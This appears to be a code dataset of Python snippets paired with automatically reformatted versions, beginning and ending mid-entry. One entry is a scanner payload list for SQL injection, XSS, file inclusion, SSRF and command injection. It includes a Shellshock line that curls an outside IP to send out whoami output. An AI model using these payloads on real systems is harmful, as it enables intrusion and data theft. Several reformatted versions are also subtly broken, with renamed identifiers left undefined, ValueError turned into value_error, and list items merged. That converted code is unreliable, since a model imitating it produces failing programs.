'-framework GLKit', '-framework OpenGLES', '-framework QuartzCore']}}}], ['OS=="mac"', {'sources': ['objc/RTCNSGLVideoView.h', 'objc/RTCNSGLVideoView.m']}]], 'xcode_settings': {'CLANG_ENABLE_OBJC_ARC': 'YES', 'CLANG_WARN_OBJC_MISSING_PROPERTY_SYNTHESIS': 'YES', 'GCC_PREFIX_HEADER': 'objc/WebRTC-Prefix.pch'}}]}]]} |
class EmptyInputException(Exception):
def __init__(self, *args, **kwargs):
super().__init__('Input path must be non-empty')
class InvalidInputException(Exception):
def __init__(self, *args, **kwargs):
super().__init__('Input path is invalid')
class InvalidURLException(Exception):
def __init__(self, url, *args, **kwargs):
super().__init__("{} is not a valid URL".format(url))
class InvalidPieceSizeException(Exception):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class TorrentNotGeneratedException(Exception):
def __init__(self, *args, **kwargs):
super().__init__('Torrent not generated - call generate() first')
| class Emptyinputexception(Exception):
def __init__(self, *args, **kwargs):
super().__init__('Input path must be non-empty')
class Invalidinputexception(Exception):
def __init__(self, *args, **kwargs):
super().__init__('Input path is invalid')
class Invalidurlexception(Exception):
def __init__(self, url, *args, **kwargs):
super().__init__('{} is not a valid URL'.format(url))
class Invalidpiecesizeexception(Exception):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class Torrentnotgeneratedexception(Exception):
def __init__(self, *args, **kwargs):
super().__init__('Torrent not generated - call generate() first') |
def convert_bytes(byte):
units = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB'
'YiB', 'BiB', 'NiB', 'DiB', 'CiB']
for x in units:
if divmod(byte, 1024)[0] == 0:
break
else:
byte /= 1024
return ('%.2lf%s' % (byte, x))
| def convert_bytes(byte):
units = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiBYiB', 'BiB', 'NiB', 'DiB', 'CiB']
for x in units:
if divmod(byte, 1024)[0] == 0:
break
else:
byte /= 1024
return '%.2lf%s' % (byte, x) |
def test_function(some_value):
"""This is just a test function to show the issues
with PyCharm text."""
if some_value <= 10:
print('{} is below 10'.format(some_value))
else:
print('{} at least 10'.format(some_value))
test_function(4)
test_function(12) | def test_function(some_value):
"""This is just a test function to show the issues
with PyCharm text."""
if some_value <= 10:
print('{} is below 10'.format(some_value))
else:
print('{} at least 10'.format(some_value))
test_function(4)
test_function(12) |
def read_sender_input():
try:
input_data = input()
return classify_input(input_data)
except EOFError:
return None,None
def classify_input(input_data):
attribute = input_data.split(' ')
if ValidInput(attribute):
temperature = float(attribute[0])
charge_rate = float(attribute[1])
return temperature, charge_rate
raise ValueError("wrong input")
def ValidInput(attribute):
return (len(attribute)==2) and isfloat(attribute[0]) and isfloat(attribute[1])
def isfloat(val):
try:
float(val)
return True
except ValueError:
return False
| def read_sender_input():
try:
input_data = input()
return classify_input(input_data)
except EOFError:
return (None, None)
def classify_input(input_data):
attribute = input_data.split(' ')
if valid_input(attribute):
temperature = float(attribute[0])
charge_rate = float(attribute[1])
return (temperature, charge_rate)
raise value_error('wrong input')
def valid_input(attribute):
return len(attribute) == 2 and isfloat(attribute[0]) and isfloat(attribute[1])
def isfloat(val):
try:
float(val)
return True
except ValueError:
return False |
def configure(conf):
conf.recurse('armv7a.py', once=False)
conf.env.VALID_ARCHITECTURES = ['armv7s'] + conf.env.VALID_ARCHITECTURES
conf.env.append_unique('DEFINES', ['_ARM_V7S'])
| def configure(conf):
conf.recurse('armv7a.py', once=False)
conf.env.VALID_ARCHITECTURES = ['armv7s'] + conf.env.VALID_ARCHITECTURES
conf.env.append_unique('DEFINES', ['_ARM_V7S']) |
# Definition for singly-linked list with a random pointer.
# class RandomListNode(object):
# def __init__(self, x):
# self.label = x
# self.next = None
# self.random = None
class Solution(object):
def copyRandomList(self, head):
"""
:type head: RandomListNode
:rtype: RandomListNode
"""
if not head:
return None
p = head
np = RandomListNode(head.label)
p.link = np
if p.random:
if p.random == p:
np.random = np
else:
p.random.pending = [np]
p1 = p
p2 = p1.next
np1 = np
while p2:
np2 = RandomListNode(p2.label)
p2.link = np2
np1.next = np2
if hasattr(p2, "pending"):
for x in p2.pending:
x.random = np2
# check random
randomNode = p2.random
if randomNode:
if hasattr(randomNode, "link"):
np2.random = randomNode.link
else:
if not hasattr(randomNode, "pending"):
randomNode.pending = []
randomNode.pending.append(np2)
p1 = p2
p2 = p2.next
np1 = np2
return np
| class Solution(object):
def copy_random_list(self, head):
"""
:type head: RandomListNode
:rtype: RandomListNode
"""
if not head:
return None
p = head
np = random_list_node(head.label)
p.link = np
if p.random:
if p.random == p:
np.random = np
else:
p.random.pending = [np]
p1 = p
p2 = p1.next
np1 = np
while p2:
np2 = random_list_node(p2.label)
p2.link = np2
np1.next = np2
if hasattr(p2, 'pending'):
for x in p2.pending:
x.random = np2
random_node = p2.random
if randomNode:
if hasattr(randomNode, 'link'):
np2.random = randomNode.link
else:
if not hasattr(randomNode, 'pending'):
randomNode.pending = []
randomNode.pending.append(np2)
p1 = p2
p2 = p2.next
np1 = np2
return np |
"""
Custom exceptions
"""
class ImproperlyConfigured(Exception):
"""Raised when demosys is configured incorrectly"""
pass
| """
Custom exceptions
"""
class Improperlyconfigured(Exception):
"""Raised when demosys is configured incorrectly"""
pass |
# you can write to stdout for debugging purposes, e.g.
# print("this is a debug message")
def solution(A):
# write your code in Python 3.6
n = len(A)
left = [0]*n
# max left slice
for i in range(1, n-1):
left[i] = max(0, left[i-1] + A[i])
right = [0]*n
# max right slice
for i in range(n-2, 1, -1):
right[i] = max(0, right[i+1] + A[i])
# max sum
doubleSlice = -10_000
for i in range(1, n-1):
doubleSlice = max(doubleSlice, left[i-1] + right[i+1])
return doubleSlice
| def solution(A):
n = len(A)
left = [0] * n
for i in range(1, n - 1):
left[i] = max(0, left[i - 1] + A[i])
right = [0] * n
for i in range(n - 2, 1, -1):
right[i] = max(0, right[i + 1] + A[i])
double_slice = -10000
for i in range(1, n - 1):
double_slice = max(doubleSlice, left[i - 1] + right[i + 1])
return doubleSlice |
######################################################################
# Author: Dr. Patrick Shepherd TODO: Change this to your names
# Username: shepherdp TODO: Change this to your usernames
#
# Assignment: T5: Buggy Fruit
# Purpose: A flawed birthday program
######################################################################
# Acknowledgements:
# Original Author: Dr. Jan Pearce
#
# licensed under a Creative Commons
# Attribution-Noncommercial-Share Alike 3.0 United States License.
####################################################################################
def happyBirthday(i, x): #FIXME: parameter names should be meaningful!! please fix!
'''Happy birthday function''' #FIXME: example of useless docstring- please fix!
for i in range(x):
print("Happy Birthday to you!")
print("Happy Birthday, dear "+i+".")
print("Happy Birthday to you!")
happyBirthday('Felix', 4) # name and number of times to loop
#FIXME: Where's the main function?! Please add a main, making sure that all code is wrapped in main() or happyBirthday()
#FIXME: Call the happyBirthday() function from main() passing the two parameters needed.
| def happy_birthday(i, x):
"""Happy birthday function"""
for i in range(x):
print('Happy Birthday to you!')
print('Happy Birthday, dear ' + i + '.')
print('Happy Birthday to you!')
happy_birthday('Felix', 4) |
waf_checker = [ " '",
" AND 1",
" /**/AND/**/1",
" AND 1=1",
" AND 1 LIKE 1",
" ' AND '1'='1",
"<img src=x onerror=alert('XSS')>",
"<img onfoo=f()>",
"<script>alert('intrusion')</script>"
]
Sql_injection = {
"error_based" : ["'", "')", "';", '"', '")', '";', '`', '`)',
'`;', '\\', "%27", "%%2727", "%25%27", "%60", "%5C"],
"union_query" : [" UNION ALL SELECT 1,2,3,4",
" UNION ALL SELECT 1,2,3,4,5-- ",
" UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
" UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ",
" AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
" UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",
],
"boolean_based" : [ " AND 1=0",
"' AND '1'='1",
"' AND 1=1--",
" ' AND 1=1#",
" AND 1=1 AND '%'='",
" AND 7300=7300 AND 'pKlZ'='pKlZ",
" AS INJECTX WHERE 1=1 AND 1=1--",
" ORDER BY 2--",
" RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
" %' AND 8310=8310 AND '%'='",
" and (select substring(@@version,1,1))='X'",
" and (select substring(@@version,3,1))='S'",
" AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-",
" AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--",
" AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--",
" AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--",
" AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--",
" AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--"
]
}
XSS = ["<A/hREf=\"j%0aavas%09cript%0a:%09con%0afirm%0d``\">z",
"<d3\"<\"/onclick=\"1>[confirm``]\"<\">z",
"<d3/onmouseenter=[2].find(confirm)>z",
"<details open ontoggle=confirm()>",
"<script y=\"><\">/*<script* */prompt()</script",
"<w=\"/x=\"y>\"/ondblclick=`<`[confir\u006d``]>z",
"<a href=\"javascript%26colon;alert(1)\">click",
"<a href=javascript:alert(1)>click",
"<script/\"<a\"/src=data:=\".<a,[8].some(confirm)>",
"<svg/x=\">\"/onload=confirm()//"]
file_inclusion = ["/etc/hosts",
"/etc/shells",
"/etc/my.conf",
"/etc/ssh/ssh_config",
"/etc/httpd/logs/access_log",
"/var/www/log/access_log",
"/var/www/logs/access_log"]
ssrf = ["https://localhost/",
"http://127.127.127.127",
"http://[0:0:0:0:0:ffff:127.0.0.1]",
"http://127.1.1.1:80\@@127.2.2.2:80/"
"http://[::]:80/",
"http://0000::1:80/",
"file:///etc/passwd"
"dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>"]
command_injection = ["<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->",
"<!--#exec%20cmd="/usr/bin/id;-->",
";system('cat%20/etc/passwd')",
"||/usr/bin/id|",
"() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`\"",
"cat /etc/hosts",
"<!--#exec cmd=\"/bin/cat /etc/passwd\"-->"]
| waf_checker = [" '", ' AND 1', ' /**/AND/**/1', ' AND 1=1', ' AND 1 LIKE 1', " ' AND '1'='1", "<img src=x onerror=alert('XSS')>", '<img onfoo=f()>', "<script>alert('intrusion')</script>"]
sql_injection = {'error_based': ["'", "')", "';", '"', '")', '";', '`', '`)', '`;', '\\', '%27', '%%2727', '%25%27', '%60', '%5C'], 'union_query': [' UNION ALL SELECT 1,2,3,4', ' UNION ALL SELECT 1,2,3,4,5-- ', " UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5", " UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ", ' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ', " UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--"], 'boolean_based': [' AND 1=0', "' AND '1'='1", "' AND 1=1--", " ' AND 1=1#", " AND 1=1 AND '%'='", " AND 7300=7300 AND 'pKlZ'='pKlZ", ' AS INJECTX WHERE 1=1 AND 1=1--', ' ORDER BY 2--', " RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='", " %' AND 8310=8310 AND '%'='", " and (select substring(@@version,1,1))='X'", " and (select substring(@@version,3,1))='S'", ' AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-', ' AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--', ' AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--', ' AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--', ' AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--', ' AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--']}
xss = ['<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z', '<d3"<"/onclick="1>[confirm``]"<">z', '<d3/onmouseenter=[2].find(confirm)>z', '<details open ontoggle=confirm()>', '<script y="><">/*<script* */prompt()</script', '<w="/x="y>"/ondblclick=`<`[confirm``]>z', '<a href="javascript%26colon;alert(1)">click', '<a href=javascript:alert(1)>click', '<script/"<a"/src=data:=".<a,[8].some(confirm)>', '<svg/x=">"/onload=confirm()//']
file_inclusion = ['/etc/hosts', '/etc/shells', '/etc/my.conf', '/etc/ssh/ssh_config', '/etc/httpd/logs/access_log', '/var/www/log/access_log', '/var/www/logs/access_log']
ssrf = ['https://localhost/', 'http://127.127.127.127', 'http://[0:0:0:0:0:ffff:127.0.0.1]', 'http://127.1.1.1:80\\@@127.2.2.2:80/http://[::]:80/', 'http://0000::1:80/', 'file:///etc/passwddict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>']
command_injection = ['<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->', '<!--#exec%20cmd="/usr/bin/id;-->', ";system('cat%20/etc/passwd')", '||/usr/bin/id|', '() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\\`whoami\\`"', 'cat /etc/hosts', '<!--#exec cmd="/bin/cat /etc/passwd"-->'] |
class SearchList(list):
def find(self, name):
items = []
for child in self:
if child.__class__ == self.__class__:
items += child.find(name)
else:
if child == name:
items.append(child)
if len(items) == 1:
return items[0]
elif items:
return items
else:
return None
class SearchDict(dict):
def find(self, search_string):
# Find the user by name
user = self.get(search_string)
if user:
return user
else:
# If the user can't be found by name, try searching by ID
for name, user in self.items():
if str(user.id) == search_string:
return user
| class Searchlist(list):
def find(self, name):
items = []
for child in self:
if child.__class__ == self.__class__:
items += child.find(name)
elif child == name:
items.append(child)
if len(items) == 1:
return items[0]
elif items:
return items
else:
return None
class Searchdict(dict):
def find(self, search_string):
user = self.get(search_string)
if user:
return user
else:
for (name, user) in self.items():
if str(user.id) == search_string:
return user |
#
# PySNMP MIB module ALCATEL-IND1-STACK-MANAGER-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ALCATEL-IND1-STACK-MANAGER-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:19:30 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
softentIND1StackMgr, = mibBuilder.importSymbols("ALCATEL-IND1-BASE", "softentIND1StackMgr")
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint")
InterfaceIndex, = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, ObjectIdentity, Unsigned32, Counter32, TimeTicks, Gauge32, NotificationType, MibIdentifier, Integer32, ModuleIdentity, iso, Bits, Counter64, IpAddress = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ObjectIdentity", "Unsigned32", "Counter32", "TimeTicks", "Gauge32", "NotificationType", "MibIdentifier", "Integer32", "ModuleIdentity", "iso", "Bits", "Counter64", "IpAddress")
DisplayString, RowStatus, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "RowStatus", "TextualConvention")
alcatelIND1StackMgrMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1))
alcatelIND1StackMgrMIB.setRevisions(('2009-02-06 00:00', '2007-04-03 00:00', '2005-07-15 00:00', '2004-07-01 00:00', '2004-04-23 00:00', '2004-04-08 00:00', '2004-04-04 00:00', '2004-03-22 00:00', '2004-03-08 00:00', '2001-08-27 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: alcatelIND1StackMgrMIB.setRevisionsDescriptions(('Added alaStackMgrOperStackingMode and alaStackMgrAdminStackingMode objects. Added AlaStackMgrStackingMode TEXTUAL-CONVENTION.', 'Updated copyright information.', 'New trap alaStackMgrBadMixTrap has been added. AlaStackMgrSlotState & AlaStackMgrLinkNumber textual convention have been modified.', 'Updates on definitions for link states. Updates on pass through slot range.', 'New trap alaStackMgrOutOfPassThruSlotsTrap has been added.', 'alaStackMgrPassThruTrap has been split in three traps to assure backwards compatibility with previous releases of the Birds Of Prey products.', '-Command action and command status objects added to the chassis table. -Link state textual conventions have been updated.', 'Objects to handle information about token usage.', 'Objects to support the pass through mode added.', 'Addressing discrepancies with Alcatel Standard.',))
if mibBuilder.loadTexts: alcatelIND1StackMgrMIB.setLastUpdated('200902060000Z')
if mibBuilder.loadTexts: alcatelIND1StackMgrMIB.setOrganization('Alcatel-Lucent')
if mibBuilder.loadTexts: alcatelIND1StackMgrMIB.setContactInfo('Please consult with Customer Service to ensure the most appropriate version of this document is used with the products in question: Alcatel-Lucent, Enterprise Solutions Division (Formerly Alcatel Internetworking, Incorporated) 26801 West Agoura Road Agoura Hills, CA 91301-5122 United States Of America Telephone: North America +1 800 995 2696 Latin America +1 877 919 9526 Europe +31 23 556 0100 Asia +65 394 7933 All Other +1 818 878 4507 Electronic Mail: support@ind.alcatel.com World Wide Web: http://alcatel-lucent.com/wps/portal/enterprise File Transfer Protocol: ftp://ftp.ind.alcatel.com/pub/products/mibs')
if mibBuilder.loadTexts: alcatelIND1StackMgrMIB.setDescription('This module describes an authoritative enterprise-specific Simple Network Management Protocol (SNMP) Management Information Base (MIB): For the Birds Of Prey Product Line Stack Manager The right to make changes in specification and other information contained in this document without prior notice is reserved. No liability shall be assumed for any incidental, indirect, special, or consequential damages whatsoever arising from or related to this document or the information contained herein. Vendors, end-users, and other interested parties are granted non-exclusive license to use this specification in connection with management of the products for which it is intended to be used. Copyright (C) 1995-2007 Alcatel-Lucent ALL RIGHTS RESERVED WORLDWIDE')
alcatelIND1StackMgrMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1))
alcatelIND1StackMgrMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 2))
alcatelIND1StackMgrTrapObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 3))
alaStackMgrTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4))
class AlaStackMgrLinkNumber(TextualConvention, Integer32):
description = 'Lists the port numbers that the stackable ports can hold. Also the values are the same as the one marked on the Stack chassis pannel. These values are hardware dependent as follows: - First generation stackable switches - 24 ports: linkA27=27, linkB28=28, - First generation stackable switches - 48 ports: linkA51=51, linkB52=52, - 1st version of 2nd generation stackable switches : linkA31=31, linkB32=32. - 2nd version of 2nd generation stackable switches 24-port : linkA25=25, linkB26=26, - 2nd version of 2nd generation stackable switches 48-port : linkA29=29, linkB30=30.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(27, 28, 51, 52, 31, 32, 25, 26, 29, 30, 1, 2))
namedValues = NamedValues(("linkA27", 27), ("linkB28", 28), ("linkA51", 51), ("linkB52", 52), ("linkA31", 31), ("linkB32", 32), ("linkA25", 25), ("linkB26", 26), ("linkA29", 29), ("linkB30", 30), ("linkA", 1), ("linkB", 2))
class AlaStackMgrNINumber(TextualConvention, Integer32):
description = 'The numbers allocated for the stack NIs are as follows: - 0 = invalid slot number; - 1..8 = valid and assigned slot numbers corresponding values from the entPhysicalTable; - 1001..1008 = switches operating in pass through mode; - 255 = unassigned slot number.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 1008)
class AlaStackMgrLinkStatus(TextualConvention, Integer32):
description = 'Provides the logical stack link status. The logical link is considered operational if the physical link is operational and communication with the adjacent switch is active. The possible values are: - up(1), - down(2).'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("up", 1), ("down", 2))
class AlaStackMgrSlotRole(TextualConvention, Integer32):
description = 'Indicates the role of each switch within the stack as follows: - unassigned(0), - primary(1), - secondary(2), - idle(3), - standalone(4), - passthrough(5)'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5))
namedValues = NamedValues(("unassigned", 0), ("primary", 1), ("secondary", 2), ("idle", 3), ("standalone", 4), ("passthrough", 5))
class AlaStackMgrStackStatus(TextualConvention, Integer32):
description = 'Indicates whether the stack ring is or not in loop as follows: - loop(1), - noloop(2)'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("loop", 1), ("noloop", 2))
class AlaStackMgrSlotState(TextualConvention, Integer32):
description = "Current operational state of a stack element as follows: - running(1) : switch is fully operational, - duplicateSlot(2): switch operates in pass through mode due to slot duplication, - clearedSlot(3) : switch operates in pass through mode upon management command, - outOfSlots(4) : switch operates in pass through because the maximum number of allowed stackable swicthes has been reached, - outOfTokens(5) : switch operates in pass through mode because no tokens are available to be assigned. - badMix (6) : switch operates in pass through mode because it's not compatible with the existing stack."
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))
namedValues = NamedValues(("running", 1), ("duplicateSlot", 2), ("clearedSlot", 3), ("outOfSlots", 4), ("outOfTokens", 5), ("badMix", 6))
class AlaStackMgrCommandAction(TextualConvention, Integer32):
description = 'Identifies which of the following actions is to be performed: - notSiginificant(0) : no action, - clearSlot(1) : saved slot number will be removed from persistent database, - clearSlotImmediately : saved slot number will be cleared and change will be in effect right away causing the switch to enter in pass through mode, - reloadAny(3) : reboot an element regardless of its operational mode, - reloadPassThru(4) : reboot an element that is operating in pass thru mode.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4))
namedValues = NamedValues(("notSignificant", 0), ("clearSlot", 1), ("clearSlotImmediately", 2), ("reloadAny", 3), ("reloadPassThru", 4))
class AlaStackMgrCommandStatus(TextualConvention, Integer32):
description = 'Identifies the current status of the last action command received as follows: - notSignificant(0), - clearSlotInProgress(1), - clearSlotFailed(2), - clearSlotSuccess(3), - setSlotInProgress(4), - setSlotFailed(5), - setSlotSuccess(6).'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6))
namedValues = NamedValues(("notSignificant", 0), ("clearSlotInProgress", 1), ("clearSlotFailed", 2), ("clearSlotSuccess", 3), ("setSlotInProgress", 4), ("setSlotFailed", 5), ("setSlotSuccess", 6))
class AlaStackMgrStackingMode(TextualConvention, Integer32):
description = 'Stacking mode, which specifies the ability of a switch to be part of a set of switches or virtual chassis: - stackable(1) :the switch may be stacked with other switches in the same virtual chassis. - standalone(2) :the switch is not allowed to be stacked together with other switches.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("stackable", 1), ("standalone", 2))
alaStackMgrChassisTable = MibTable((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1), )
if mibBuilder.loadTexts: alaStackMgrChassisTable.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrChassisTable.setDescription('Maintains a list with information about all the switches that participate on the stack herein refered to as chassis.')
alaStackMgrChassisEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1), ).setIndexNames((0, "ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrSlotNINumber"))
if mibBuilder.loadTexts: alaStackMgrChassisEntry.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrChassisEntry.setDescription('Each entry corresponds to a chassis and lists its role and neighbors in the stack.')
alaStackMgrSlotNINumber = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 1), AlaStackMgrNINumber()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrSlotNINumber.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrSlotNINumber.setDescription('Numbers allocated for the stack NIs as follows: - 0: invalid slot number - 1..8: valid and assigned slot numbers corresponding to values from the entPhysicalTable - 1001..1008: swicthes operating in pass through mode - 255: unassigned slot number.')
alaStackMgrSlotCMMNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 72))).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrSlotCMMNumber.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrSlotCMMNumber.setDescription('The numbers allocated for the stack CMMs are from 65..72 or 0 if not present')
alaStackMgrChasRole = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 3), AlaStackMgrSlotRole()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrChasRole.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrChasRole.setDescription('The current role of the chassis as follows: - unassigned(0), - primary(1), - secondary(2), - idle(3), - standalone(4), - passthrough(5).')
alaStackMgrLocalLinkStateA = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 4), AlaStackMgrLinkStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrLocalLinkStateA.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrLocalLinkStateA.setDescription('1 indicates that the stacking link A is up, which means it knows its adjacent node. 2 indicates that the stacking link A is inactive and RemoteNISlotA and RemoteLinkA are not significants.')
alaStackMgrRemoteNISlotA = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 5), AlaStackMgrNINumber()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrRemoteNISlotA.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrRemoteNISlotA.setDescription(' This is the remote NI slot seen by the current NI through its stacking link A. The numbers allocated for the Stack NIs are 1..8, 1001..1008 or 0 if not present')
alaStackMgrRemoteLinkA = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 6), AlaStackMgrLinkNumber()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrRemoteLinkA.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrRemoteLinkA.setDescription('This is the remote link of the remote NI slot seen through the stacking link A. The values for these ports are platform dependent. The possible values are: - 0: not present - linkA: 25, 27, 29, 31 or 51 - linkB: 26, 28, 30, 32 or 52.')
alaStackMgrLocalLinkStateB = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 7), AlaStackMgrLinkStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrLocalLinkStateB.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrLocalLinkStateB.setDescription('1 indicates that the stacking link B is up, which means it knows its adjacent node. 2 indicates that the stacking link B is inactive and RemoteNISlotB and RemoteLinkB are not significants.')
alaStackMgrRemoteNISlotB = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 8), AlaStackMgrNINumber()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrRemoteNISlotB.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrRemoteNISlotB.setDescription(' This is the remote NI slot seen by the current NI through its stacking link B. The numbers allocated for the Stack NIs are 1..8, 1001..1008 or 0 if not present')
alaStackMgrRemoteLinkB = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 9), AlaStackMgrLinkNumber()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrRemoteLinkB.setStatus('current')
